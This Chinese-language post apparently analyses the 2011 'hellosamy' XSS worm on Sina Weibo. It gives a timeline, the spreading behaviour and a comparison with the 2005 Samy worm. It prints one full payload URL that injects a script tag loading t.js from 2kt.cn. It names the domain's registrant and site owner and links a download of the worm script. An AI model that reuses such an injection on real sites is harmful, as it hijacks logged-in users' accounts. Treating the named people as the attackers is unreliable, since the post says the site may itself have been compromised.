一、事件的經過
新浪微網誌突然出現大範圍“中毒”,大量使用者自動發送“建黨大業中穿幫的地方”、“個稅起征點有望提到4000”、“郭美美事件的一些未注意到的細節”、“3D肉團團高清國語版種子”等帶連結的微網誌與私信,并自動關注一位名為hellosamy的使用者。
事件的效果:
和
事件的經過線索如下:
20:14,開始有大量帶V的認證使用者中招轉發蠕蟲
20:30,2kt.cn中的病毒頁面無法通路
20:32,新浪微網誌中hellosamy使用者無法通路
21:02,新浪漏洞修補完畢
影響有多大:32961(這位hellosamy在帳号被封前的好友數量)。
二、采用了什麼樣的攻擊方法
1、利用了新浪微網誌存在的XSS漏洞;
2、使用有道提供的短域名服務(這些網址目前已經“無害”);
例如,通過http://163.fm/PxZHoxn,将連結指向:
http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/p_w_picpaths/t.js%3E%3C/script%3E?type=update
3、當新浪登陸使用者不小心通路到相關網頁時,由于處于登入狀态,會運作這個js腳本做幾件事情:
a.發微網誌(讓更多的人看到這些消息,自然也就有更多人受害);
b.加關注,加uid為2201270010的使用者關注——這應該就是大家提到的hellosamy了;
c.發私信,給好友發私信傳播這些連結;
三、攻擊者是誰?
攻擊者不一定是2kt.cn的擁有者。目前暫時隻能獲得2kt.cn域名、網站擁有者資訊如下。
不排除這個網站被攻擊後,伺服器被人放置惡意代碼。
通過whois查詢,2kt.cn的域名擁有者資訊如下:
注冊人: 張志
管理者郵件:[email protected]
通過工信部的備案查詢:http://www.miibeian.gov.cn/publish/query/indexFirst.action
網站負責人姓名:劉孝德
網站備案/許可證号:蘇ICP備10108026号-1
四、為什麼叫hellosamy?
2005年,首個利用跨站點腳本缺陷的蠕蟲samy被“創造”出來了。Samy利用網站設計方面的缺陷,建立了一份“惡意”的使用者檔案,當該使用者檔案被浏 覽時,就會自動地激活代碼,将使用者添加到Samy的“好友”清單中。另外,惡意代碼還會被拷貝到使用者的檔案中,當其他人檢視使用者的檔案時,蠕蟲會繼續傳 播。Samy蠕蟲能夠造成與拒絕服務相當的效應,會造成好友清單中好友數量呈指數級增長,最終會消耗系統的大量資源。
是以,這次新浪微網誌的蠕蟲,象是在對samy蠕蟲緻敬
五、參考資訊
samy蠕蟲的傳播經曆與技術細節:http://namb.la/popular,http://namb.la/popular/tech.html
新浪hellosamy蠕蟲的傳播與細節:http://bbs.unnoo.com/forum.php?mod=viewthread&tid=156&fromuid=2
六、本次蠕蟲事件中的代碼下載下傳
t.js下載下傳位址: 06.28_sina_XSS.txt.zip (1.41 KB, 下載下傳次數: 223)